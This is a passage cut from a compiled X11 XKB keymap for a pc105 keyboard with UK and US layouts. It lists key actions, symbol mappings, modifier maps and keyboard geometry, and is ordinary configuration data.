action= PtrBtn(button=1);
};
interpret Pointer_Button2+AnyOfOrNone(all) {
action= PtrBtn(button=2);
};
interpret Pointer_Button3+AnyOfOrNone(all) {
action= PtrBtn(button=3);
};
interpret Pointer_DblClick_Dflt+AnyOfOrNone(all) {
action= PtrBtn(button=default,count=2);
};
interpret Pointer_DblClick1+AnyOfOrNone(all) {
action= PtrBtn(button=1,count=2);
};
interpret Pointer_DblClick2+AnyOfOrNone(all) {
action= PtrBtn(button=2,count=2);
};
interpret Pointer_DblClick3+AnyOfOrNone(all) {
action= PtrBtn(button=3,count=2);
};
interpret Pointer_Drag_Dflt+AnyOfOrNone(all) {
action= LockPtrBtn(button=default,affect=both);
};
interpret Pointer_Drag1+AnyOfOrNone(all) {
action= LockPtrBtn(button=1,affect=both);
};
interpret Pointer_Drag2+AnyOfOrNone(all) {
action= LockPtrBtn(button=2,affect=both);
};
interpret Pointer_Drag3+AnyOfOrNone(all) {
action= LockPtrBtn(button=3,affect=both);
};
interpret Pointer_EnableKeys+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeys);
};
interpret Pointer_Accelerate+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeysAccel);
};
interpret Pointer_DfltBtnNext+AnyOfOrNone(all) {
action= SetPtrDflt(affect=button,button=+1);
};
interpret Pointer_DfltBtnPrev+AnyOfOrNone(all) {
action= SetPtrDflt(affect=button,button=-1);
};
interpret AccessX_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AccessXKeys);
};
interpret AccessX_Feedback_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AccessXFeedback);
};
interpret RepeatKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=RepeatKeys);
};
interpret SlowKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=SlowKeys);
};
interpret BounceKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=BounceKeys);
};
interpret StickyKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=StickyKeys);
};
interpret MouseKeys_Enable+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeys);
};
interpret MouseKeys_Accel_Enable+AnyOfOrNone(all) {
action= LockControls(controls=MouseKeysAccel);
};
interpret Overlay1_Enable+AnyOfOrNone(all) {
action= LockControls(controls=Overlay1);
};
interpret Overlay2_Enable+AnyOfOrNone(all) {
action= LockControls(controls=Overlay2);
};
interpret AudibleBell_Enable+AnyOfOrNone(all) {
action= LockControls(controls=AudibleBell);
};
interpret Terminate_Server+AnyOfOrNone(all) {
action= Terminate();
};
interpret Alt_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Alt,clearLocks);
};
interpret Alt_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Alt,clearLocks);
};
interpret Meta_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Meta,clearLocks);
};
interpret Meta_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Meta,clearLocks);
};
interpret Super_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Super,clearLocks);
};
interpret Super_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Super,clearLocks);
};
interpret Hyper_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Hyper,clearLocks);
};
interpret Hyper_R+AnyOfOrNone(all) {
action= SetMods(modifiers=Hyper,clearLocks);
};
interpret Shift_L+AnyOfOrNone(all) {
action= SetMods(modifiers=Shift,clearLocks);
};
interpret XF86Switch_VT_1+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=1,!same);
};
interpret XF86Switch_VT_2+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=2,!same);
};
interpret XF86Switch_VT_3+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=3,!same);
};
interpret XF86Switch_VT_4+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=4,!same);
};
interpret XF86Switch_VT_5+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=5,!same);
};
interpret XF86Switch_VT_6+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=6,!same);
};
interpret XF86Switch_VT_7+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=7,!same);
};
interpret XF86Switch_VT_8+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=8,!same);
};
interpret XF86Switch_VT_9+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=9,!same);
};
interpret XF86Switch_VT_10+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=10,!same);
};
interpret XF86Switch_VT_11+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=11,!same);
};
interpret XF86Switch_VT_12+AnyOfOrNone(all) {
repeat= True;
action= SwitchScreen(screen=12,!same);
};
interpret XF86LogGrabInfo+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x50,data[1]=0x72,data[2]=0x47,data[3]=0x72,data[4]=0x62,data[5]=0x73,data[6]=0x00);
};
interpret XF86LogWindowTree+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x50,data[1]=0x72,data[2]=0x57,data[3]=0x69,data[4]=0x6e,data[5]=0x73,data[6]=0x00);
};
interpret XF86Next_VMode+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x2b,data[1]=0x56,data[2]=0x4d,data[3]=0x6f,data[4]=0x64,data[5]=0x65,data[6]=0x00);
};
interpret XF86Prev_VMode+AnyOfOrNone(all) {
repeat= True;
action= Private(type=0x86,data[0]=0x2d,data[1]=0x56,data[2]=0x4d,data[3]=0x6f,data[4]=0x64,data[5]=0x65,data[6]=0x00);
};
interpret ISO_Level5_Shift+AnyOfOrNone(all) {
action= SetMods(modifiers=LevelFive,clearLocks);
};
interpret ISO_Level5_Latch+AnyOfOrNone(all) {
action= LatchMods(modifiers=LevelFive,clearLocks,latchToLock);
};
interpret ISO_Level5_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=LevelFive);
};
interpret Caps_Lock+AnyOfOrNone(all) {
action= LockMods(modifiers=Lock);
};
interpret Any+Exactly(Lock) {
action= LockMods(modifiers=Lock);
};
interpret Any+AnyOf(all) {
action= SetMods(modifiers=modMapMods,clearLocks);
};
group 2 = AltGr;
group 3 = AltGr;
group 4 = AltGr;
indicator "Caps Lock" {
!allowExplicit;
whichModState= locked;
modifiers= Lock;
};
indicator "Num Lock" {
!allowExplicit;
whichModState= locked;
modifiers= NumLock;
};
indicator "Scroll Lock" {
whichModState= locked;
modifiers= ScrollLock;
};
indicator "Shift Lock" {
!allowExplicit;
whichModState= locked;
modifiers= Shift;
};
indicator "Group 2" {
!allowExplicit;
groups= 0xfe;
};
indicator "Mouse Keys" {
indicatorDrivesKeyboard;
controls= mouseKeys;
};
};
xkb_symbols "pc+gb+us:2+inet(evdev)+compose(ralt)" {
name[group1]="English (UK)";
name[group2]="English (US)";
key <ESC> { [ Escape ] };
key <AE01> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 1, exclam, onesuperior, exclamdown ],
symbols[Group2]= [ 1, exclam ]
};
key <AE02> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 2, quotedbl, twosuperior, oneeighth ],
symbols[Group2]= [ 2, at ]
};
key <AE03> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 3, sterling, threesuperior, sterling ],
symbols[Group2]= [ 3, numbersign ]
};
key <AE04> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 4, dollar, EuroSign, onequarter ],
symbols[Group2]= [ 4, dollar ]
};
key <AE05> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 5, percent, onehalf, threeeighths ],
symbols[Group2]= [ 5, percent ]
};
key <AE06> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 6, asciicircum, threequarters, fiveeighths ],
symbols[Group2]= [ 6, asciicircum ]
};
key <AE07> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 7, ampersand, braceleft, seveneighths ],
symbols[Group2]= [ 7, ampersand ]
};
key <AE08> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 8, asterisk, bracketleft, trademark ],
symbols[Group2]= [ 8, asterisk ]
};
key <AE09> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 9, parenleft, bracketright, plusminus ],
symbols[Group2]= [ 9, parenleft ]
};
key <AE10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ 0, parenright, braceright, degree ],
symbols[Group2]= [ 0, parenright ]
};
key <AE11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ minus, underscore, backslash, questiondown ],
symbols[Group2]= [ minus, underscore ]
};
key <AE12> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ equal, plus, dead_cedilla, dead_ogonek ],
symbols[Group2]= [ equal, plus ]
};
key <BKSP> { [ BackSpace, BackSpace ] };
key <TAB> { [ Tab, ISO_Left_Tab ] };
key <AD01> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ q, Q, at, Greek_OMEGA ],
symbols[Group2]= [ q, Q ]
};
key <AD02> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ w, W, lstroke, Lstroke ],
symbols[Group2]= [ w, W ]
};
key <AD03> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ e, E, e, E ],
symbols[Group2]= [ e, E ]
};
key <AD04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ r, R, paragraph, registered ],
symbols[Group2]= [ r, R ]
};
key <AD05> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ t, T, tslash, Tslash ],
symbols[Group2]= [ t, T ]
};
key <AD06> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ y, Y, leftarrow, yen ],
symbols[Group2]= [ y, Y ]
};
key <AD07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ u, U, downarrow, uparrow ],
symbols[Group2]= [ u, U ]
};
key <AD08> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ i, I, rightarrow, idotless ],
symbols[Group2]= [ i, I ]
};
key <AD09> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ o, O, oslash, Oslash ],
symbols[Group2]= [ o, O ]
};
key <AD10> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ p, P, thorn, THORN ],
symbols[Group2]= [ p, P ]
};
key <AD11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ bracketleft, braceleft, dead_diaeresis, dead_abovering ],
symbols[Group2]= [ bracketleft, braceleft ]
};
key <AD12> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ bracketright, braceright, dead_tilde, dead_macron ],
symbols[Group2]= [ bracketright, braceright ]
};
key <RTRN> { [ Return ] };
key <LCTL> { [ Control_L ] };
key <AC01> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ a, A, ae, AE ],
symbols[Group2]= [ a, A ]
};
key <AC02> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ s, S, ssharp, section ],
symbols[Group2]= [ s, S ]
};
key <AC03> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ d, D, eth, ETH ],
symbols[Group2]= [ d, D ]
};
key <AC04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ f, F, dstroke, ordfeminine ],
symbols[Group2]= [ f, F ]
};
key <AC05> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ g, G, eng, ENG ],
symbols[Group2]= [ g, G ]
};
key <AC06> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ h, H, hstroke, Hstroke ],
symbols[Group2]= [ h, H ]
};
key <AC07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ j, J, dead_hook, dead_horn ],
symbols[Group2]= [ j, J ]
};
key <AC08> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ k, K, kra, ampersand ],
symbols[Group2]= [ k, K ]
};
key <AC09> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ l, L, lstroke, Lstroke ],
symbols[Group2]= [ l, L ]
};
key <AC10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ semicolon, colon, dead_acute, dead_doubleacute ],
symbols[Group2]= [ semicolon, colon ]
};
key <AC11> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ apostrophe, at, dead_circumflex, dead_caron ],
symbols[Group2]= [ apostrophe, quotedbl ]
};
key <TLDE> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ grave, notsign, bar, bar ],
symbols[Group2]= [ grave, asciitilde ]
};
key <LFSH> { [ Shift_L ] };
key <BKSL> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ numbersign, asciitilde, dead_grave, dead_breve ],
symbols[Group2]= [ backslash, bar ]
};
key <AB01> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ z, Z, guillemotleft, less ],
symbols[Group2]= [ z, Z ]
};
key <AB02> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ x, X, guillemotright, greater ],
symbols[Group2]= [ x, X ]
};
key <AB03> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ c, C, cent, copyright ],
symbols[Group2]= [ c, C ]
};
key <AB04> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ v, V, leftdoublequotemark, leftsinglequotemark ],
symbols[Group2]= [ v, V ]
};
key <AB05> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ b, B, rightdoublequotemark, rightsinglequotemark ],
symbols[Group2]= [ b, B ]
};
key <AB06> {
type[group1]= "FOUR_LEVEL_ALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ n, N, n, N ],
symbols[Group2]= [ n, N ]
};
key <AB07> {
type[group1]= "FOUR_LEVEL_SEMIALPHABETIC",
type[group2]= "ALPHABETIC",
symbols[Group1]= [ m, M, mu, masculine ],
symbols[Group2]= [ m, M ]
};
key <AB08> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ comma, less, horizconnector, multiply ],
symbols[Group2]= [ comma, less ]
};
key <AB09> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ period, greater, periodcentered, division ],
symbols[Group2]= [ period, greater ]
};
key <AB10> {
type[group1]= "FOUR_LEVEL",
symbols[Group1]= [ slash, question, dead_belowdot, dead_abovedot ],
symbols[Group2]= [ slash, question ]
};
key <RTSH> { [ Shift_R ] };
key <KPMU> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Multiply, KP_Multiply, KP_Multiply, KP_Multiply, XF86ClearGrab ]
};
key <LALT> { [ Alt_L, Meta_L ] };
key <SPCE> { [ space ] };
key <CAPS> { [ Caps_Lock ] };
key <FK01> {
type= "CTRL+ALT",
symbols[Group1]= [ F1, F1, F1, F1, XF86Switch_VT_1 ]
};
key <FK02> {
type= "CTRL+ALT",
symbols[Group1]= [ F2, F2, F2, F2, XF86Switch_VT_2 ]
};
key <FK03> {
type= "CTRL+ALT",
symbols[Group1]= [ F3, F3, F3, F3, XF86Switch_VT_3 ]
};
key <FK04> {
type= "CTRL+ALT",
symbols[Group1]= [ F4, F4, F4, F4, XF86Switch_VT_4 ]
};
key <FK05> {
type= "CTRL+ALT",
symbols[Group1]= [ F5, F5, F5, F5, XF86Switch_VT_5 ]
};
key <FK06> {
type= "CTRL+ALT",
symbols[Group1]= [ F6, F6, F6, F6, XF86Switch_VT_6 ]
};
key <FK07> {
type= "CTRL+ALT",
symbols[Group1]= [ F7, F7, F7, F7, XF86Switch_VT_7 ]
};
key <FK08> {
type= "CTRL+ALT",
symbols[Group1]= [ F8, F8, F8, F8, XF86Switch_VT_8 ]
};
key <FK09> {
type= "CTRL+ALT",
symbols[Group1]= [ F9, F9, F9, F9, XF86Switch_VT_9 ]
};
key <FK10> {
type= "CTRL+ALT",
symbols[Group1]= [ F10, F10, F10, F10, XF86Switch_VT_10 ]
};
key <NMLK> { [ Num_Lock ] };
key <SCLK> { [ Scroll_Lock ] };
key <KP7> { [ KP_Home, KP_7 ] };
key <KP8> { [ KP_Up, KP_8 ] };
key <KP9> { [ KP_Prior, KP_9 ] };
key <KPSU> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Subtract, KP_Subtract, KP_Subtract, KP_Subtract, XF86Prev_VMode ]
};
key <KP4> { [ KP_Left, KP_4 ] };
key <KP5> { [ KP_Begin, KP_5 ] };
key <KP6> { [ KP_Right, KP_6 ] };
key <KPAD> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Add, KP_Add, KP_Add, KP_Add, XF86Next_VMode ]
};
key <KP1> { [ KP_End, KP_1 ] };
key <KP2> { [ KP_Down, KP_2 ] };
key <KP3> { [ KP_Next, KP_3 ] };
key <KP0> { [ KP_Insert, KP_0 ] };
key <KPDL> { [ KP_Delete, KP_Decimal ] };
key <LVL3> {
type= "ONE_LEVEL",
symbols[Group1]= [ ISO_Level3_Shift ]
};
key <LSGT> {
type= "FOUR_LEVEL",
symbols[Group1]= [ backslash, bar, bar, brokenbar ]
};
key <FK11> {
type= "CTRL+ALT",
symbols[Group1]= [ F11, F11, F11, F11, XF86Switch_VT_11 ]
};
key <FK12> {
type= "CTRL+ALT",
symbols[Group1]= [ F12, F12, F12, F12, XF86Switch_VT_12 ]
};
key <KATA> { [ Katakana ] };
key <HIRA> { [ Hiragana ] };
key <HENK> { [ Henkan_Mode ] };
key <HKTG> { [ Hiragana_Katakana ] };
key <MUHE> { [ Muhenkan ] };
key <KPEN> { [ KP_Enter ] };
key <RCTL> { [ Control_R ] };
key <KPDV> {
type= "CTRL+ALT",
symbols[Group1]= [ KP_Divide, KP_Divide, KP_Divide, KP_Divide, XF86Ungrab ]
};
key <PRSC> {
type= "PC_ALT_LEVEL2",
symbols[Group1]= [ Print, Sys_Req ]
};
key <RALT> {
type= "TWO_LEVEL",
symbols[Group1]= [ Multi_key, Multi_key ]
};
key <LNFD> { [ Linefeed ] };
key <HOME> { [ Home ] };
key <UP> { [ Up ] };
key <PGUP> { [ Prior ] };
key <LEFT> { [ Left ] };
key <RGHT> { [ Right ] };
key <END> { [ End ] };
key <DOWN> { [ Down ] };
key <PGDN> { [ Next ] };
key <INS> { [ Insert ] };
key <DELE> { [ Delete ] };
key <MUTE> { [ XF86AudioMute ] };
key <VOL-> { [ XF86AudioLowerVolume ] };
key <VOL+> { [ XF86AudioRaiseVolume ] };
key <POWR> { [ XF86PowerOff ] };
key <KPEQ> { [ KP_Equal ] };
key <I126> { [ plusminus ] };
key <PAUS> {
type= "PC_CONTROL_LEVEL2",
symbols[Group1]= [ Pause, Break ]
};
key <I128> { [ XF86LaunchA ] };
key <I129> { [ KP_Decimal, KP_Decimal ] };
key <HNGL> { [ Hangul ] };
key <HJCV> { [ Hangul_Hanja ] };
key <LWIN> { [ Super_L ] };
key <RWIN> { [ Super_R ] };
key <COMP> { [ Menu ] };
key <STOP> { [ Cancel ] };
key <AGAI> { [ Redo ] };
key <PROP> { [ SunProps ] };
key <UNDO> { [ Undo ] };
key <FRNT> { [ SunFront ] };
key <COPY> { [ XF86Copy ] };
key <OPEN> { [ XF86Open ] };
key <PAST> { [ XF86Paste ] };
key <FIND> { [ Find ] };
key <CUT> { [ XF86Cut ] };
key <HELP> { [ Help ] };
key <I147> { [ XF86MenuKB ] };
key <I148> { [ XF86Calculator ] };
key <I150> { [ XF86Sleep ] };
key <I151> { [ XF86WakeUp ] };
key <I152> { [ XF86Explorer ] };
key <I153> { [ XF86Send ] };
key <I155> { [ XF86Xfer ] };
key <I156> { [ XF86Launch1 ] };
key <I157> { [ XF86Launch2 ] };
key <I158> { [ XF86WWW ] };
key <I159> { [ XF86DOS ] };
key <I160> { [ XF86ScreenSaver ] };
key <I161> { [ XF86RotateWindows ] };
key <I162> { [ XF86TaskPane ] };
key <I163> { [ XF86Mail ] };
key <I164> { [ XF86Favorites ] };
key <I165> { [ XF86MyComputer ] };
key <I166> { [ XF86Back ] };
key <I167> { [ XF86Forward ] };
key <I169> { [ XF86Eject ] };
key <I170> { [ XF86Eject, XF86Eject ] };
key <I171> { [ XF86AudioNext ] };
key <I172> { [ XF86AudioPlay, XF86AudioPause ] };
key <I173> { [ XF86AudioPrev ] };
key <I174> { [ XF86AudioStop, XF86Eject ] };
key <I175> { [ XF86AudioRecord ] };
key <I176> { [ XF86AudioRewind ] };
key <I177> { [ XF86Phone ] };
key <I179> { [ XF86Tools ] };
key <I180> { [ XF86HomePage ] };
key <I181> { [ XF86Reload ] };
key <I182> { [ XF86Close ] };
key <I185> { [ XF86ScrollUp ] };
key <I186> { [ XF86ScrollDown ] };
key <I187> { [ parenleft ] };
key <I188> { [ parenright ] };
key <I189> { [ XF86New ] };
key <I190> { [ Redo ] };
key <FK13> { [ XF86Tools ] };
key <FK14> { [ XF86Launch5 ] };
key <FK15> { [ XF86Launch6 ] };
key <FK16> { [ XF86Launch7 ] };
key <FK17> { [ XF86Launch8 ] };
key <FK18> { [ XF86Launch9 ] };
key <FK20> { [ XF86AudioMicMute ] };
key <FK21> { [ XF86TouchpadToggle ] };
key <FK22> { [ XF86TouchpadOn ] };
key <FK23> { [ XF86TouchpadOff ] };
key <MDSW> { [ Mode_switch ] };
key <ALT> { [ NoSymbol, Alt_L ] };
key <META> { [ NoSymbol, Meta_L ] };
key <SUPR> { [ NoSymbol, Super_L ] };
key <HYPR> { [ NoSymbol, Hyper_L ] };
key <I208> { [ XF86AudioPlay ] };
key <I209> { [ XF86AudioPause ] };
key <I210> { [ XF86Launch3 ] };
key <I211> { [ XF86Launch4 ] };
key <I212> { [ XF86LaunchB ] };
key <I213> { [ XF86Suspend ] };
key <I214> { [ XF86Close ] };
key <I215> { [ XF86AudioPlay ] };
key <I216> { [ XF86AudioForward ] };
key <I218> { [ Print ] };
key <I220> { [ XF86WebCam ] };
key <I223> { [ XF86Mail ] };
key <I224> { [ XF86Messenger ] };
key <I225> { [ XF86Search ] };
key <I226> { [ XF86Go ] };
key <I227> { [ XF86Finance ] };
key <I228> { [ XF86Game ] };
key <I229> { [ XF86Shop ] };
key <I231> { [ Cancel ] };
key <I232> { [ XF86MonBrightnessDown ] };
key <I233> { [ XF86MonBrightnessUp ] };
key <I234> { [ XF86AudioMedia ] };
key <I235> { [ XF86Display ] };
key <I236> { [ XF86KbdLightOnOff ] };
key <I237> { [ XF86KbdBrightnessDown ] };
key <I238> { [ XF86KbdBrightnessUp ] };
key <I239> { [ XF86Send ] };
key <I240> { [ XF86Reply ] };
key <I241> { [ XF86MailForward ] };
key <I242> { [ XF86Save ] };
key <I243> { [ XF86Documents ] };
key <I244> { [ XF86Battery ] };
key <I245> { [ XF86Bluetooth ] };
key <I246> { [ XF86WLAN ] };
modifier_map Control { <LCTL> };
modifier_map Shift { <LFSH> };
modifier_map Shift { <RTSH> };
modifier_map Mod1 { <LALT> };
modifier_map Lock { <CAPS> };
modifier_map Mod2 { <NMLK> };
modifier_map Mod5 { <LVL3> };
modifier_map Control { <RCTL> };
modifier_map Mod4 { <LWIN> };
modifier_map Mod4 { <RWIN> };
modifier_map Mod5 { <MDSW> };
modifier_map Mod1 { <META> };
modifier_map Mod4 { <SUPR> };
modifier_map Mod4 { <HYPR> };
};
xkb_geometry "pc(pc105)" {
width= 470;
height= 180;
alias <AC00> = <CAPS>;
alias <AA00> = <LCTL>;
baseColor= "white";
labelColor= "black";
xfont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
description= "Generic 105";
shape "NORM" {
corner= 1,
{ [ 18, 18 ] },
{ [ 2, 1 ], [ 16, 16 ] }
};
shape "BKSP" {
corner= 1,
{ [ 38, 18 ] },
{ [ 2, 1 ], [ 36, 16 ] }
};
shape "TABK" {
corner= 1,
{ [ 28, 18 ] },
{ [ 2, 1 ], [ 26, 16 ] }
};
shape "BKSL" {
corner= 1,
{ [ 28, 18 ] },
{ [ 2, 1 ], [ 26, 16 ] }
};
shape "RTRN" {
corner= 1,
{ [ 0, 0 ], [ 28, 0 ], [ 28, 37 ], [ 5, 37 ],
[ 5, 18 ], [ 0, 18 ] },
{ [ 2, 1 ], [ 26, 1 ], [ 26, 35 ], [ 7, 35 ],
[ 7, 16 ], [ 2, 16 ] },
approx= { [ 5, 0 ], [ 28, 37 ] }
};
shape "CAPS" {
corner= 1,
{ [ 33, 18 ] },
{ [ 2, 1 ], [ 31, 16 ] }
};
shape "LFSH" {
corner= 1,
{ [ 25, 18 ] },
{ [ 2, 1 ], [ 23, 16 ] }
};
shape "RTSH" {
corner= 1,
{ [ 50, 18 ] },
{ [ 2, 1 ], [ 48, 16 ] }
};
shape "MODK" {
corner= 1,
{ [ 27, 18 ] },
{ [ 2, 1 ], [ 25, 16 ] }
};
shape "SMOD" {
corner= 1,
{ [ 23, 18 ] },
{ [ 2, 1 ], [ 21, 16 ] }
};
shape "SPCE" {
corner= 1,
{ [ 113, 18 ] },
{ [ 2, 1 ], [ 111, 16 ] }
};
shape "KP0" {
corner= 1,
{ [ 37, 18 ] },
{ [ 2, 1 ], [ 35, 16 ] }
};
shape "KPAD" {
corner= 1,
{ [ 18, 37 ] },
{ [ 2, 1 ], [ 16, 35 ] }
};
shape "LEDS" { { [ 75, 20 ] } };
shape "LED" { { [ 5, 1 ] } };
section "Function" {
key.color= "grey20";
priority= 7;
top= 22;
left= 19;
width= 351;
height= 19;
row {
top= 1;
left= 1;
keys {
{ <ESC>, "NORM", 1 },
{ <FK01>, "NORM", 20, color="white" },
{ <FK02>, "NORM", 1, color="white" },
{ <FK03>, "NORM", 1, color="white" },
{ <FK04>, "NORM", 1, color="white" },
{ <FK05>, "NORM", 11, color="white" },
{ <FK06>, "NORM", 1, color="white" },
{ <FK07>, "NORM", 1, color="white" },
{ <FK08>, "NORM", 1, color="white" },
{ <FK09>, "NORM", 11, color="white" },
{ <FK10>, "NORM", 1, color="white" },
{ <FK11>, "NORM", 1, color="white" },
{ <FK12>, "NORM", 1, color="white" },
{ <PRSC>, "NORM", 8, color="white" },
{ <SCLK>, "NORM", 1, color="white" },
{ <PAUS>, "NORM", 1, color="white" }
};
};
}; // End of "Function" section
section "Alpha" {
key.color= "white";
priority= 8;
top= 61;
left= 19;
width= 287;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <TLDE>, "NORM", 1 }, { <AE01>, "NORM", 1 },
{ <AE02>, "NORM", 1 }, { <AE03>, "NORM", 1 },
{ <AE04>, "NORM", 1 }, { <AE05>, "NORM", 1 },
{ <AE06>, "NORM", 1 }, { <AE07>, "NORM", 1 },
{ <AE08>, "NORM", 1 }, { <AE09>, "NORM", 1 },
{ <AE10>, "NORM", 1 }, { <AE11>, "NORM", 1 },
{ <AE12>, "NORM", 1 },
{ <BKSP>, "BKSP", 1, color="grey20" }
};
};
row {
top= 20;
left= 1;
keys {
{ <TAB>, "TABK", 1, color="grey20" },
{ <AD01>, "NORM", 1 }, { <AD02>, "NORM", 1 },
{ <AD03>, "NORM", 1 }, { <AD04>, "NORM", 1 },
{ <AD05>, "NORM", 1 }, { <AD06>, "NORM", 1 },
{ <AD07>, "NORM", 1 }, { <AD08>, "NORM", 1 },
{ <AD09>, "NORM", 1 }, { <AD10>, "NORM", 1 },
{ <AD11>, "NORM", 1 }, { <AD12>, "NORM", 1 },
{ <RTRN>, "RTRN", 1, color="grey20" }
};
};
row {
top= 39;
left= 1;
keys {
{ <CAPS>, "CAPS", 1, color="grey20" },
{ <AC01>, "NORM", 1 }, { <AC02>, "NORM", 1 },
{ <AC03>, "NORM", 1 }, { <AC04>, "NORM", 1 },
{ <AC05>, "NORM", 1 }, { <AC06>, "NORM", 1 },
{ <AC07>, "NORM", 1 }, { <AC08>, "NORM", 1 },
{ <AC09>, "NORM", 1 }, { <AC10>, "NORM", 1 },
{ <AC11>, "NORM", 1 }, { <BKSL>, "NORM", 1 }
};
};
row {
top= 58;
left= 1;
keys {
{ <LFSH>, "LFSH", 1, color="grey20" },
{ <LSGT>, "NORM", 1 }, { <AB01>, "NORM", 1 },
{ <AB02>, "NORM", 1 }, { <AB03>, "NORM", 1 },
{ <AB04>, "NORM", 1 }, { <AB05>, "NORM", 1 },
{ <AB06>, "NORM", 1 }, { <AB07>, "NORM", 1 },
{ <AB08>, "NORM", 1 }, { <AB09>, "NORM", 1 },
{ <AB10>, "NORM", 1 },
{ <RTSH>, "RTSH", 1, color="grey20" }
};
};
row {
top= 77;
left= 1;
keys {
